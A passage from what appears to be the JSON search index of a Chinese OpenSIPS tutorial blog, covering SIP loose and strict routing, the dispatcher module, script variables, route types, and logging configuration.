Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #7 bye BYE sip:callee@u2.domain.com SIP/2.0 Route: \u0026lt;sip:p1.example.com;lr\u0026gt;,\u0026lt;sip:p2.domain.com;lr\u0026gt; #8 bye BYE sip:callee@u2.domain.com SIP/2.0 Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; #9 bye BYE sip:callee@u2.domain.com SIP/2.0 Traversing a Strict-Routing Proxy ","permalink":"https://wdd.js.org/opensips/ch5/strict-loose-routing/","summary":"松散路由是sip 2版本的新的路由方法。严格路由是老的路由方法。\n如何从sip消息中区分严格路由和松散路由 下图sip消息中Route字段中带有**lr, **则说明这是松散路由。\nREGISTER sip:127.0.0.1 SIP/2.0 Via: SIP/2.0/UDP 127.0.0.1:58979;rport;branch=z9hG4bKPjMRzNdeTKn9rHNDtyJuVoyrDb84.cPtL8 Route: \u0026lt;sip:127.0.0.1;lr\u0026gt; Max-Forwards: 70 From: \u0026#34;1001\u0026#34; \u0026lt;sip:1001@172.17.0.2\u0026gt;;tag=oqkOzbQYd9cx5vXFjUnB1WufgWUZZxtZ To: \u0026#34;1001\u0026#34; \u0026lt;sip:1001@172.17.0.2\u0026gt; 功能上的区别 严格路由,sip请求经过uas后,invite url每次都会被重写。\n松散路由,sip请求经过uas后,invite url不变。\n#1 invite INVITE sip:callee@domain.com SIP/2.0 Contact: sip:caller@u1.example.com 
#2 invite INVITE sip:callee@domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #3 invite INVITE sip:callee@u2.domain.com SIP/2.0 Contact: sip:caller@u1.example.com Record-Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #4 200 ok SIP/2.0 200 OK Contact: sip:callee@u2.domain.com Record-Route: \u0026lt;sip:p2.domain.com;lr\u0026gt; Record-Route: \u0026lt;sip:p1.example.com;lr\u0026gt; #7 bye BYE sip:callee@u2.domain.com SIP/2.0 Route: \u0026lt;sip:p1.","title":"严格路由和松散路由"},{"content":"dispatcher模块用来分发sip消息。\ndispatcher如何记录目的地状态 dispatcher会使用一张表。\n需要关注两个字段destination, state。\ndestination表示sip消息要发往的目的地 state表示对目的地的状态检测结果 0 可用 1 不可用 2 表示正在检测 opensips只会向可用的目的地转发sip消息\nid setid destination state 1 1 sip:p1:5060 0 2 1 sip:p2:5060 1 3 1 sip:p2:5061 2 dispatcher如何检测目的地的状态 本地的opensips会周期性的向目的地发送options包,如果对方立即返回200ok, 就说明目的地可用。\n在达到一定阈值后,目的地一直无响应,则opensips将其设置为不可用状态,或者正在检测状态。如下图所示\n代码例子 ds_select_dst()函数会去选择可用的目的地,并且设置当前sip消息的转发地址。如果发现无可用的转发地址,则进入504 服务不可用的逻辑。\n如果sip终端注册时返回504,则可以从dispatcher模块,排查看看是不是所有的目的地都处于不可用状态。\nif (!ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;)) { 
send_reply(\u0026#34;504\u0026#34;,\u0026#34;Service Unavailable\u0026#34;); exit; } ","permalink":"https://wdd.js.org/opensips/ch6/dispatcher/","summary":"dispatcher模块用来分发sip消息。\ndispatcher如何记录目的地状态 dispatcher会使用一张表。\n需要关注两个字段destination, state。\ndestination表示sip消息要发往的目的地 state表示对目的地的状态检测结果 0 可用 1 不可用 2 表示正在检测 opensips只会向可用的目的地转发sip消息\nid setid destination state 1 1 sip:p1:5060 0 2 1 sip:p2:5060 1 3 1 sip:p2:5061 2 dispatcher如何检测目的地的状态 本地的opensips会周期性的向目的地发送options包,如果对方立即返回200ok, 就说明目的地可用。\n在达到一定阈值后,目的地一直无响应,则opensips将其设置为不可用状态,或者正在检测状态。如下图所示\n代码例子 ds_select_dst()函数会去选择可用的目的地,并且设置当前sip消息的转发地址。如果发现无可用的转发地址,则进入504 服务不可用的逻辑。\n如果sip终端注册时返回504,则可以从dispatcher模块,排查看看是不是所有的目的地都处于不可用状态。\nif (!ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;)) { send_reply(\u0026#34;504\u0026#34;,\u0026#34;Service Unavailable\u0026#34;); exit; } ","title":"sip消息分发之dispatcher模块"},{"content":"变量的使用方式 $(\u0026lt;context\u0026gt;type(name)[index]{transformation}) 变量都以$符号开头 type表示变量的类型:核心变量,自定义变量,键值对变量 name表示变量名:如$var(name), $avp(age) index表示索引,有些变量类似于数组,可以使用索引来指定。索引可以用正数和负数,如-1表示最后一个元素 transformations表示类型转换,如获取一个字符串值的长度,大小写转换等操作 context表示变量存在的作用域,opensips有请求的作用域和响应的作用域 # by type $ru # by type and name $hdr(Contact) # by type and index $(ct[0]) # by type name and index $(avp(gw_ip)[2]) # by context $(\u0026lt;request\u0026gt;ru) $(\u0026lt;reply\u0026gt;hdr(Contact)) 引用变量 所有的引用变量都是可读的,但是只有部分变量可以修改。引用变量一般都是英文含义的首字母缩写,刚开始接触opensips的同学可能很不习惯。实际上通过首字母大概是可以猜出变量的含义的。\n必须记住的变量用黄色标记。\n变量名 英文含义 中文解释 是否可修改 $ru request url 请求url 是 $rU Username in SIP Request\u0026rsquo;s URI 是 $ci call id callId $hdr(from) request headers from 请求头中的from字段 是 $Ts current time unix Timestamp 当前时间的unix时间戳 $branch Branch $cl Content-Length $cs CSeq number $cT Content-Type $dd Domain of destination URI 目标地址的域名 是 $di Diversion header URI $dp Port of destination URI 目标地址的端口 是 $dP Transport protocol of destination URI 传输协议 $du Destination URI 目标地址 是 $fd From URI domain $fn From display name $ft From tag $fu From URI $fU From URI username $mb SIP message buffer $mf Message Flags $mi SIP message ID $ml SIP message length $od Domain in SIP Request\u0026rsquo;s original URI $op Port of SIP request\u0026rsquo;s original URI $oP Transport protocol of SIP request original URI $ou SIP Request\u0026rsquo;s original URI $oU Username in SIP Request\u0026rsquo;s original URI $param(idx) Route parameter $pp Process id $rd Domain in SIP Request\u0026rsquo;s URI $rb Body of request/reply 是 $rc Returned code $re Remote-Party-ID header URI $rm SIP request\u0026rsquo;s method $rp SIP request\u0026rsquo;s port 是 $rP Transport protocol of SIP request URI $rr SIP reply\u0026rsquo;s reason $rs SIP reply\u0026rsquo;s status $rt reference to URI of refer-to header $Ri Received IP 
address $Rp Received port $sf Script flags $si IP source address $sp Source port $td To URI Domain $tn To display name $tt To tag $tu To URI $tU To URI Username $TF String formatted time $TS Startup unix time stamp $ua User agent header 更多变量可以参考:https://www.opensips.org/Documentation/Script-CoreVar-2-4\n键值对变量 键值对变量是按需创建的 键值对只能用于有状态的路由处理中 键值对会绑定到指定的消息或者事务上 键值对初始化时是空值 键值对可以在所有的路由中读写 在响应路由中使用键值对,需要加载tm模块,并且设置onreply_avp_ mode参数 键值对可以读写,也可以删除 可以把键值对理解为key为hash, 值为堆栈的数据结构 $avp(my_name) = \u0026#34;wang\u0026#34; $avp(my_name) = \u0026#34;duan\u0026#34; xlog(\u0026#34;$avp(my_name)\u0026#34;) # duan xlog(\u0026#34;$avp(my_name)[0]\u0026#34;) # wang xlog(\u0026#34;$avp(my_name)[*]\u0026#34;) # wang duanduan 脚本变量 脚本变量只存在于当前主路由及其子路由中。路由结束,脚本变量将回收。 脚本变量需要指定初始化值,否则变量的值将不确定。 脚本变量只能有一个值 脚本变量读取要比键值对变量快,脚本变量直接引用内存的位置 如果需要变量,可以优先考虑使用脚本变量 $var(my_name) = \u0026#34;wangduanduan\u0026#34; $var(log_msg) = $var(my_name) + $ci + $fu xlog(\u0026#34;$var(log_msg)\u0026#34;) 脚本翻译 脚本翻译可以理解为一种工具函数,可以用来获取字符串长度,获取字符串的子字符等等操作。\n获取字符串长度 $(fu{s.len}) 字符串截取子串 $(var(x){s.substr,5,2}) 获取字符串的某部分 $(avp(my_uri){uri.user}) 将字符串值转为整数 $(var(x){s.int}) 翻译也可以链式调用 $(hdr(Test){s.escape.common}{s.len}) ","permalink":"https://wdd.js.org/opensips/ch5/var/","summary":"变量的使用方式 $(\u0026lt;context\u0026gt;type(name)[index]{transformation}) 变量都以$符号开头 type表示变量的类型:核心变量,自定义变量,键值对变量 name表示变量名:如$var(name), $avp(age) index表示需要,有些变量类似于数组,可以使用需要来指定。需要可以用正数和负数,如-1表示最后一个元素 transformations表示类型转换,如获取一个字符串值的长度,大小写转换等操作 context表示变量存在的作用域,opensips有请求的作用域和响应的作用域 # by type $ru # type type and name $hdr(Contact) # bye type and index $(ct[0]) # by type name and index $(avp(gw_ip)[2]) # by context $(\u0026lt;request\u0026gt;ru) $(\u0026lt;reply\u0026gt;hdr(Contact)) 引用变量 所有的引用变量都是可读的,但是只有部分变量可以修改。引用变量一般都是英文含义的首字母缩写,刚开始接触opensips的同学可能很不习惯。实际上通过首字母大概是可以猜出变量的含义的。\n必须记住变量的用黄色标记。\n变量名 英文含义 中文解释 是否可修改 $ru request url 请求url 是 $rU Username in SIP Request\u0026rsquo;s URI 是 $ci call id callId $hdr(from) request headers from 请求头中的from字段 是 $Ts 
current time unix Timestamp 当前时间的unix时间戳 $branch Branch $cl Content-Length $cs CSeq number $cT Content-Type $dd Domain of destination URI 目标地址的域名 是 $di Diversion header URI $dp Port of destination URI 目标地址的端口 是 $dP Transport protocol of destination URI 传输协议 $du Destination URI 目标地址 是 $fd From URI domain $fn From display name $ft From tag $fu From URI $fU From URI username $mb SIP message buffer $mf Message Flags $mi SIP message ID $ml SIP message length $od Domain in SIP Request\u0026rsquo;s original URI $op Port of SIP request\u0026rsquo;s original URI $oP Transport protocol of SIP request original URI $ou SIP Request\u0026rsquo;s original URI $oU Username in SIP Request\u0026rsquo;s original URI $param(idx) Route parameter $pp Process id $rd Domain in SIP Request\u0026rsquo;s URI $rb Body of request/reply 是 $rc Returned code $re Remote-Party-ID header URI $rm SIP request\u0026rsquo;s method $rp SIP request\u0026rsquo;s port 是 $rP Transport protocol of SIP request URI $rr SIP reply\u0026rsquo;s reason $rs SIP reply\u0026rsquo;s status $rt reference to URI of refer-to header $Ri Received IP address $Rp Received port $sf Script flags $si IP source address $sp Source port $td To URI Domain $tn To display name $tt To tag $tu To URI $tU To URI Username $TF String formatted time $TS Startup unix time stamp $ua User agent header 更多变量可以参考:https://www.","title":"变量的使用"},{"content":" 掌握路由触发时机的关键是以下几点\n消息是请求还是响应 消息是进入opensips的(incoming),还是离开opensips的(outgoing) 从opensips发出去的ack请求,不会触发任何路由 **进入opensips(**incoming) 离开opensips(outgoing) 请求 触发请求路由:例如invite, register, ack 触发分支路由。如invite的转发 响应 触发响应路由。如果是大于等于300的响应,还会触发失败路由。 不会触发任何路由 ","permalink":"https://wdd.js.org/opensips/ch5/triger-time/","summary":" 掌握路由触发时机的关键是以下几点\n消息是请求还是响应 消息是进入opensips的(incoming),还是离开opensips的(outgoing) 从opensips发出去的ack请求,不会触发任何路由 **进入opensips(**incoming) 离开opensips(outgoing) 请求 触发请求路由:例如invite, register, ack 触发分支路由。如invite的转发 响应 触发响应路由。如果是大于等于300的响应,还会触发失败路由。 不会触发任何路由 
","title":"路由的触发时机"},{"content":"在说这两种路由前,先说一个故事。蚂蚁找食物。\n蚁群里有一种蚂蚁负责搜寻食物叫做侦察兵,侦察兵得到消息,不远处可能有食物。于是侦察兵开始搜索食物的位置,并沿途留下自己的气味。翻过几座山之后,侦察兵发现了食物。然后又沿着气味回到了部落。然后通知搬运兵,沿着自己留下的气味,就可以找到食物。\n在上面的故事中,侦察兵可以看成是初始化请求,搬运兵可以看做是序列化请求。在学习opensips的路由过程中,能够区分初始化请求和序列化请求,是非常重要的。\n一般路由处理,查数据库,查dns等都在初始化请求中做处理,序列化请求只需要简单地根据sip route字段去路由就可以了。\n类型 功能 message 如何区分 特点 初始化请求 创建session或者dialog invite has_totag()是false 1. 发现被叫:初始化请求经过不同的服务器,DNS服务器,前缀路由等各种复杂的路由方法,找到被叫2. **记录路径: **记录到达被叫的路径,给后续的序列请求提供导航 序列化请求 修改或者终止session ack, bye, re-invite, notify has_totag()是true 1. 只需要根据初始化请求提供的导航路径,来到达目的地,不需要复杂的路由逻辑。 区分初始化请求和序列化请求,是看header中的to字段是否含有tag标签。\ntag参数被用于to和from字段。使用callid,fromtag和totag三个字段可以来唯一识别一个dialog。每个tag来自一个ua。\n当一个ua发出一个不在对话中的请求时,fromtag提供一半的对话标识,当对话完成时,另一方参与者提供totag标识。\n举例来说,对于一个invite请求,例如Alice-\u0026gt;Proxy\ninvite请求to字段无tag参数 当alice回ack请求时,已经含有了to tag。这就是一个序列化请求了。因为通过之前的200ok, alice已经知道到达bob的路径。 INVITE sip:bob@biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74b43 Max-Forwards: 70 Route: \u0026lt;sip:ss1.atlanta.example.com;lr\u0026gt; From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl # 有from tag To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt; # 无to tag Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Contact: \u0026lt;sip:alice@client.atlanta.example.com;transport=tcp\u0026gt; Content-Type: application/sdp Content-Length: 151 ACK sip:bob@client.biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74b76 Max-Forwards: 70 Route: \u0026lt;sip:ss1.atlanta.example.com;lr\u0026gt;, \u0026lt;sip:ss2.biloxi.example.com;lr\u0026gt; From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt;;tag=314159 Call-ID: 3848276298220188511@atlanta.example.com CSeq: 2 ACK Content-Length: 0 注意,一定要明确一个消息,到底是请求还是响应。我们说初始化请求和序列化请求,说的都是请求,而不是响应。\n有些响应消息,例如代理返回的407响应,也会带有to tag。\nSIP/2.0 407 Proxy Authorization Required Via: 
SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74b43 ;received=192.0.2.101 From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt;;tag=3flal12sf Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Proxy-Authenticate: Digest realm=\u0026#34;atlanta.example.com\u0026#34;, qop=\u0026#34;auth\u0026#34;, nonce=\u0026#34;f84f1cec41e6cbe5aea9c8e88d359\u0026#34;, opaque=\u0026#34;\u0026#34;, stale=FALSE, algorithm=MD5 Content-Length: 0 下图初始化请求\n下图序列化请求\n路由脚本中,初始化请求都是需要下很多功夫去考虑如何处理的。而对于序列化请求的处理则要简单得多。\n","permalink":"https://wdd.js.org/opensips/ch5/init-seque/","summary":"在说这两种路由前,先说一个故事。蚂蚁找食物。\n蚁群里有一种蚂蚁负责搜寻食物叫做侦察兵,侦察兵得到消息,不远处可能有食物。于是侦察兵开始搜索食物的位置,并沿途留下自己的气味。翻过几座山之后,侦察兵发现了食物。然后又沿着气味回到了部落。然后通知搬运兵,沿着自己留下的气味,就可以找到食物。\n在上面的故事中,侦察兵可以看成是初始化请求,搬运兵可以看做是序列化请求。在学习opensips的路由过程中,能够区分初始化请求和序列化请求,是非常重要的。\n一般路由处理,查数据库,查dns等都在初始化请求中做处理,序列化请求只需要简单地根据sip route字段去路由就可以了。\n类型 功能 message 如何区分 特点 初始化请求 创建session或者dialog invite has_totag()是false 1. 发现被叫:初始化请求经过不同的服务器,DNS服务器,前缀路由等各种复杂的路由方法,找到被叫2. **记录路径: **记录到达被叫的路径,给后续的序列请求提供导航 序列化请求 修改或者终止session ack, bye, re-invite, notify has_totag()是true 1. 
只需要根据初始化请求提供的导航路径,来到达路径,不需要复杂的路由逻辑。 区分初始化请求和序列化请求,是用header字段中的to字段是否含有tag标签。\ntag参数被用于to和from字段。使用callid,fromtag和totag三个字段可以来唯一识别一个dialog。每个tag来自一个ua。\n当一个ua发出一个不在对话中的请求时,fromtag提供一半的对话标识,当对话完成时,另一方参与者提供totag标识。\n举例来说,对于一个invite请求,例如Alice-\u0026gt;Proxy\ninvite请求to字段无tag参数 当alice回ack请求时,已经含有了to tag。这就是一个序列化请求了。因为通过之前的200ok, alice已经知道到达bob的路径。 INVITE sip:bob@biloxi.example.com SIP/2.0 Via: SIP/2.0/TCP client.atlanta.example.com:5060;branch=z9hG4bK74b43 Max-Forwards: 70 Route: \u0026lt;sip:ss1.atlanta.example.com;lr\u0026gt; From: Alice \u0026lt;sip:alice@atlanta.example.com\u0026gt;;tag=9fxced76sl # 有from tag To: Bob \u0026lt;sip:bob@biloxi.example.com\u0026gt; # 无to tag Call-ID: 3848276298220188511@atlanta.example.com CSeq: 1 INVITE Contact: \u0026lt;sip:alice@client.atlanta.example.com;transport=tcp\u0026gt; Content-Type: application/sdp Content-Length: 151 ACK sip:bob@client.biloxi.example.com SIP/2.","title":"【重点】初始化请求和序列化请求"},{"content":"当你的代码一个屏幕无法展示完时,你就需要考虑模块化的事情了。\n维护一个上千行的代码,是很辛苦,也是很恐怖的事情。\n我们应当把自己的关注点放在某个具体的点上。\n方法1 include_file 具体方法是使用include_file参数。\n如果你的opensips.cfg文件到达上千行,你可以考虑使用一下include_file指令。\ninclude_file \u0026#34;global.cfg\u0026#34; include_file \u0026#34;moudule.cfg\u0026#34; include_file \u0026#34;routing.cfg\u0026#34; 方法2 m4 宏编译 参考:https://github.com/wangduanduan/m4-opensips.cfg\n","permalink":"https://wdd.js.org/opensips/ch5/module/","summary":"当你的代码一个屏幕无法展示完时,你就需要考虑模块化的事情了。\n维护一个上千行的代码,是很辛苦,也是很恐怖的事情。\n我们应当把自己的关注点放在某个具体的点上。\n方法1 include_file 具体方法是使用include_file参数。\n如果你的opensips.cfg文件到达上千行,你可以考虑使用一下include_file指令。\ninclude_file \u0026#34;global.cfg\u0026#34; include_file \u0026#34;moudule.cfg\u0026#34; include_file \u0026#34;routing.cfg\u0026#34; 方法2 m4 宏编译 参考:https://github.com/wangduanduan/m4-opensips.cfg","title":"脚本路由模块化"},{"content":"在opensips 2.2中加入新的全局配置cfg_line, 用来返回当前日志在整个文件中的行数。\n注意,低于2.2的版本不能使用cfg_line。\n使用方法如下:\n... xlog(\u0026#34;$cfg_line enter_ack_deal\u0026#34;) ... xlog(\u0026#34;$cfg_line enter_ack_deal\u0026#34;) ... 
如果没有cfg_line这个参数,你在日志中看到enter_ack_deal后,根本无法区分是哪一行打印了这个关键词。\n使用了cfg_line后,可以在日志中看到类似如下的日志输出方式,很容易区分哪一行日志执行了。\n23 enter_ack_deal 823 enter_ack_deal ","permalink":"https://wdd.js.org/opensips/ch5/xlog/","summary":"在opensips 2.2中加入新的全局配置cfg_line, 用来返回当前日志在整个文件中的行数。\n注意,低于2.2的版本不能使用cfg_line。\n使用方法如下:\n... xlog(\u0026#34;$cfg_line enter_ack_deal\u0026#34;) ... xlog(\u0026#34;$cfg_line enter_ack_deal\u0026#34;) ... 如果没有cfg_line这个参数,你在日志中看到enter_ack_deal后,根本无法区分是哪一行打印了这个关键词。\n使用了cfg_line后,可以在日志中看到类似如下的日志输出方式,很容易区分哪一行日志执行了。\n23 enter_ack_deal 823 enter_ack_deal ","title":"优雅的使用xlog输出日志行"},{"content":"本全局参数基于opensips 2.4介绍。\nopensips的全局参数有很多,具体可以参考。https://www.opensips.org/Documentation/Script-CoreParameters-2-4#toc37\n下面介绍几个常用的参数\nlog_level=3 log_facility=LOG_LOCAL0 listen=172.16.200.228:4400 log_level log_level的值配置的越大,输出的日志越详细。log_level的值的范围是[-3, 4]\n-3 - Alert level -2 - Critical level -1 - Error level 1 - Warning level 2 - Notice level 3 - Info level 4 - Debug level log_facility log_facility用来设置独立的opensips日志文件,参考https://www.yuque.com/wangdd/opensips/log\nlisten listen用来设置opensips监听的端口和协议, 由于opensips底层支持的协议很多,所以你可以监听很多不同协议。\n注意一点:不要监听本地环回地址127.0.0.1, 而要监听etho0的ip地址。\nlisten:udp:172.16.200.228:5060 listen:tcp:172.16.200.228:5061 listen:ws:172.16.200.228:5062 ","permalink":"https://wdd.js.org/opensips/ch5/global-params/","summary":"本全局参数基于opensips 2.4介绍。\nopensips的全局参数有很多,具体可以参考。https://www.opensips.org/Documentation/Script-CoreParameters-2-4#toc37\n下面介绍几个常用的参数\nlog_level=3 log_facility=LOG_LOCAL0 listen=172.16.200.228:4400 log_level log_level的值配置的越大,输出的日志越详细。log_level的值的范围是[-3, 4]\n-3 - Alert level -2 - Critical level -1 - Error level 1 - Warning level 2 - Notice level 3 - Info level 4 - Debug level log_facility log_facility用来设置独立的opensips日志文件,参考https://www.yuque.com/wangdd/opensips/log\nlisten listen用来设置opensips监听的端口和协议, 由于opensips底层支持的协议很多,所以你可以监听很多不同协议。\n注意一点:不要监听本地环回地址127.0.0.1, 而要监听etho0的ip地址。\nlisten:udp:172.16.200.228:5060 listen:tcp:172.16.200.228:5061 
listen:ws:172.16.200.228:5062 ","title":"全局参数配置"},{"content":"opensips脚本中没有类似function这样的关键字来定义函数,它的函数主要有两个来源。\nopensips核心提供的函数: 模块提供的函数: lb_is_destination(), consume_credentials() 函数特点 opensips函数的特点\n最多支持6个参数 所有的参数都是字符串,即使写成数字,解析时也按照字符串解析 函数的返回值只能是整数 所有函数不能返回0,返回0会导致路由停止执行,return(0)相当于exit() 函数返回的正数可以翻译成true 函数返回的负数会翻译成false 使用return(9)返回结果 使用$rc获取上个函数的返回值 虽然opensips脚本中无法自定义函数,但是可以把route关键字作为函数来使用。\n可以给\n# 定义enter_log函数 route[enter_log]{ xlog(\u0026#34;$ci $fu $tu $param(1)\u0026#34;) # $param(1) 是指调用enter_log函数的第一个参数,即wangdd return(1) } route{ # 调用enter_log函数 route(enter_log, \u0026#34;wangdd\u0026#34;) # 获取enter_log的返回值 $rc xlog(\u0026#34;$rc\u0026#34;) } 如何传参 某个函数可以支持6个参数,全部都是的可选的,但是我只想传第一个和第6个,应该怎么传?\n不想传参的话,需要使用逗号隔开\nsiprec_start_recording(srs,,,,,media_ip) ","permalink":"https://wdd.js.org/opensips/ch5/function/","summary":"opensips脚本中没有类似function这样的关键字来定义函数,它的函数主要有两个来源。\nopensips核心提供的函数: 模块提供的函数: lb_is_destination(), consume_credentials() 函数特点 opensips函数的特点\n最多支持6个参数 所有的参数都是字符串,即使写成数字,解析时也按照字符串解析 函数的返回值只能是整数 所有函数不能返回0,返回0会导致路由停止执行,return(0)相当于exit() 函数返回的正数可以翻译成true 函数返回的负数会翻译成false 使用return(9)返回结果 使用$rc获取上个函数的返回值 虽然opensips脚本中无法自定义函数,但是可以把route关键字作为函数来使用。\n可以给\n# 定义enter_log函数 route[enter_log]{ xlog(\u0026#34;$ci $fu $tu $param(1)\u0026#34;) # $param(1) 是指调用enter_log函数的第一个参数,即wangdd return(1) } route{ # 调用enter_log函数 route(enter_log, \u0026#34;wangdd\u0026#34;) # 获取enter_log的返回值 $rc xlog(\u0026#34;$rc\u0026#34;) } 如何传参 某个函数可以支持6个参数,全部都是的可选的,但是我只想传第一个和第6个,应该怎么传?\n不想传参的话,需要使用逗号隔开\nsiprec_start_recording(srs,,,,,media_ip) ","title":"函数特点"},{"content":"opensips路由分为两类,主路由和子路由。主路由被opensips调用,子路由在主路由中被调用。可以理解子路由是一种函数。\n所有路由中不允许出现无任何语句的情况,否则将会导致opensips无法正常启动,例如下面\nroute[some_xxx]{ } 主路由分为几类\n请求路由 分支路由 失败路由 响应路由 本地路由 启动路由 定时器路由 事件路由 错误路由 inspect:查看sip消息内容 modifies: 修改sip消息内容,例如修改request url drop: 丢弃sip请求 forking: 可以理解为发起一个invite, 然后可以拨打多个人 signaling: 信令层的操作,例如返回200ok之类的\n路由 是否必须 默认行为 可以做 不可以做 触发方向 触发次数 请求路由 是 drop inspect,modifies, drop, signaling incoming, inbound 
分支路由 否 send out forking, modifies, drop, inspect relaying, replying,signaling outbound, outgoing, branch frok 一个请求/事务一次 失败路由 否 将错误返回给产生者 signaling,replying, inspect incoming 一个请求/事务一次 响应路由 否 relay back inspect, modifies signaling incoming, inbound 一个请求/事务一次 本地路由 否 send out signaling outbound 本地路由只能有一个 剩下的启动路由,定时器路由,事件路由,错误路由只能用来做和sip消息无关的事情。\n请求路由 请求路由因为受到从外部网络来的请求而触发。\n# 主路由 route { ...... if (is_method(\u0026#34;INVITE\u0026#34;)) { route(check_hdrs,1); # 调用子路由check_hdrs,1是传递给子路由的参数 if ($rc\u0026lt;0) # 使用$rc获取上个子路由的处理结果 exit; } } # sub-route route[check_hdrs] { if (!is_present_hf(\u0026#34;Content-Type\u0026#34;)) return(-1); if ( $param(1)==1 \u0026amp;\u0026amp; !has_body() ) # 子路由使用$param(1), 获取传递的第一个参数 return(-2); # 使用return() 返回子路由的处理结果 return(1); } $rc和$retcode都可以获取子路由的返回结果。\n请求路由是必须的一个路由,所有从网络过来的请求,都会经过请求路由。\n在请求路由中,可以做三个动作\n给出响应 向前传递 丢弃这个请求 注意事项:\nrequest路由被到达的sip请求触发 默认的动作是丢弃这个请求 分支路由 注意事项:\nrequest路由被到达的sip请求触发 默认的动作是发出这个请求 t_on_branch并不是立即执行分支路由,而是注册分支路由的处理事件 注意所有**t_on_**开头的函数都是注册钩子,而不是立即执行。注册钩子可以理解为不是现在执行,而是未来某个时间会被触发执行。 分支路由只能用来触发一次,多次触发将会重写 你可以在这个路由中修改sip request url, 但是不能执行reply等信令方面的操作 route{ ... t_on_branch(\u0026#34;nat_filter\u0026#34;) ... } branch_route[nat_filter]{ } 失败的路由 当收到大于等于300的响应时触发失败路由 route{ ... t_on_failure(\u0026#34;vm_redirect\u0026#34;) ... 
} failure_route[vm_redirects]{ } 响应路由 当收到响应时触发,包括1xx-6xx的所有响应。\n响应路由分为两类\n全局响应路由,即不带名称的onreply_route{}, 自动触发,在带名响应路由前执行。 带名称的响应路由,即onreplay_route[some_name]{},需要用t_on_reply()方法来设置触发。 route{ t_on_reply(\u0026#34;inspect_reply\u0026#34;); } onreply_route{ xlog(\u0026#34;$rm/$rs/$si/$ci: global onreply route\u0026#34;); } onreply_route[inspect_reply]{ if ( t_check_status(\u0026#34;1[0-9][0-9]\u0026#34;) ) { xlog(\u0026#34;provisional reply $T_reply_code received\\n\u0026#34;); } if ( t_check_status(\u0026#34;2[0-9][0-9]\u0026#34;) ) { xlog(\u0026#34;successful reply $T_reply_code received\\n\u0026#34;); remove_hf(\u0026#34;User-Agent\u0026#34;); } else { xlog(\u0026#34;non-2xx reply $T_reply_code received\\n\u0026#34;); } } 本地路由 有些请求是opensips自己发的,这时候触发本地路由。使用场景:在多人会议时,opensips可以给多人发送bye消息。\nlocal_route { } 启动路由 可以让你在opensips启动时做些初始化操作\n注意启动路由里面一定要有语句,哪怕是写个xlog(\u0026ldquo;hello\u0026rdquo;), 否则opensips将会无法启动。\nstartup_route { } 计时器路由 在指定的周期,触发路由。可以用来更新本地缓存。\n注意计时器路由里面一定要有语句,哪怕是写个xlog(\u0026ldquo;hello\u0026rdquo;), 否则opensips将会无法启动。\n如:每隔120秒,做个事情\ntimer_route[gw_update, 120] { # update the local cache if signalized if ($shv(reload) == 1 ) { avp_db_query(\u0026#34;select gwlist from routing where id=10\u0026#34;, \u0026#34;$avp(list)\u0026#34;); cache_store(\u0026#34;local\u0026#34;,\u0026#34;gwlist10\u0026#34;,\u0026#34; $avp(list)\u0026#34;); } } 事件路由 当收到某些事件是触发,例如日志,数据库操作,数据更新,某些\n在事件路由的内部,可以使用$param(key)的方式获取事件的某些属性。\nxlog(\u0026#34;first parameters is $param(1)\\n\u0026#34;); # 根据序号 xlog(\u0026#34;Pike Blocking IP is $param(ip)\\n\u0026#34;); # 根据key event_route[E_DISPATCHER_STATUS] { } event_route[E_PIKE_BLOCKED] { xlog(\u0026#34;IP $param(ip) has been blocked\\n\u0026#34;); } 更多可以参考: https://opensips.org/html/docs/modules/devel/event_route.html\n错误路由 用来捕获运行时错误,例如解析sip消息出错。\nerror_route { xlog(\u0026#34;$rm from $si:$sp - error level=$(err.level), info=$(err.info)\\n\u0026#34;); sl_send_reply(\u0026#34;$err.rcode\u0026#34;, \u0026#34;$err.rreason\u0026#34;); 
exit; } ","permalink":"https://wdd.js.org/opensips/ch5/routing-type/","summary":"opensips路由分为两类,主路由和子路由。主路由被opensips调用,子路由在主路由中被调用。可以理解子路由是一种函数。\n所有路由中不允许出现无任何语句的情况,否则将会导致opensips无法正常启动,例如下面\nroute[some_xxx]{ } 主路由分为几类\n请求路由 分支路由 失败路由 响应路由 本地路由 启动路由 定时器路由 事件路由 错误路由 inspect:查看sip消息内容 modifies: 修改sip消息内容,例如修改request url drop: 丢弃sip请求 forking: 可以理解为发起一个invite, 然后可以拨打多个人 signaling: 信令层的操作,例如返回200ok之类的\n路由 是否必须 默认行为 可以做 不可以做 触发方向 触发次数 请求路由 是 drop inspect,modifies, drop, signaling incoming, inbound 分支路由 否 send out forking, modifies, drop, inspect relaying, replying,signaling outbound, outgoing, branch frok 一个请求/事务一次 失败路由 否 将错误返回给产生者 signaling,replying, inspect incoming 一个请求/事务一次 响应路由 否 relay back inspect, modifies signaling incoming, inbound 一个请求/事务一次 本地路由 否 send out signaling outbound 本地路由只能有一个 剩下的启动路由,定时器路由,事件路由,错误路由只能用来做和sip消息无关的事情。","title":"路由分类"},{"content":"设置独立日志 默认情况下,opensips的日志会写在系统日志文件/var/log/message中,为了避免难以查阅日志,我们可以将opensips的日志写到单独的日志文件中。\n环境说明\ndebian buster\n这个需要做两步。\n第一步,配置opensips.cfg文件\nlog_facility=LOG_LOCAL0 第二步, 创建日志配置文件\necho \u0026#34;local0.* -/var/log/opensips.log\u0026#34; \u0026gt; 